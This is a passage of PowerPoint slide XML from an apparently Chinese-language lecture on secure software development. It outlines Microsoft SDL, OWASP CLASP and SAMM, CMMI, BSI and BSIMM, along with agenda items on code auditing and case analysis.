              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5770871" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>软件安全实现</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407086" y="2583974"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407086" y="3327460"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>案例分析</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8975090" y="2767532"/>
            <a:ext cx="0" cy="122285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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8824406" y="2616359"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>07</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId20"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8859966" y="3359845"/>
            <a:ext cx="1665168" cy="1222859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码审计</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="直接连接符 18"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId21"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10527665" y="2767532"/>
            <a:ext cx="0" cy="122285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序号"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId22"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10376981" y="2616359"/>
            <a:ext cx="1665168" cy="634800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="3200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="项标题"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId23"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10566400" y="3359785"/>
            <a:ext cx="1475740" cy="1223010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码审计-源码分析</a:t>
            </a:r>
            <a:endParaRPr sz="16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相关模型和研究</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426845"/>
            <a:ext cx="10514965" cy="2999740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>多种模型被提出和研究</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全开发生命周期（微软SDL）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>CLASP（OWASP）综合的轻量应用安全过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>CMMI软件能力成熟度集成模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>BSI系列模型（GaryMcGraw等）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SAMM（OWASP）软件保证成熟度模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>BSIMMBSI成熟度模型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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SDL</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527810"/>
            <a:ext cx="7639685" cy="92202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什么是SDL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全开发生命周期（SecurityDevelopmentLifecycle，SDL）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826770" y="2449830"/>
            <a:ext cx="7639685" cy="50673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SD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发展</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144905" y="3209290"/>
            <a:ext cx="9196705" cy="2964815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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SDL的阶段和安全活动</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735455"/>
            <a:ext cx="6096000" cy="92202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七个阶段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>十七项必需的安全活动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067435" y="2851150"/>
            <a:ext cx="9959340" cy="2986405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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SDL实施效果</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825500" y="1267460"/>
            <a:ext cx="6096000" cy="92202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正式发布软件后12个月内的漏洞对比</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>IE：漏洞总数下降35%，高危漏洞数下降63%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="2295525"/>
            <a:ext cx="5353050" cy="1847850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373505" y="4249420"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统：漏洞总数降低45%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="4757420"/>
            <a:ext cx="5318760" cy="1717040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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CLASP</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426845"/>
            <a:ext cx="10514965" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是CLASP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>综合的轻量应用安全过程（Comprehensive,LightweightApplicationSecurityProcess，CLASP）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用于构建安全软件的轻量级过程，由30个特定的活动(activities)和辅助资源构成的集合</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>针对这些活动给出了相应的指南、导则和检查列表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826770" y="3307080"/>
            <a:ext cx="10514965" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基于角色的安排</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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CMMI</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426845"/>
            <a:ext cx="10514965" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CMMI</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软件能力成熟度集成模型(CapabilityMaturityodelIntegration)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826770" y="2475865"/>
            <a:ext cx="10514965" cy="3830955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>五级</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CMMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看作是成功企业如何做好软件的一些习惯、做法、准则等的集合，是如何做好软件的最佳实践的集合。</a:t>
            </a:r>
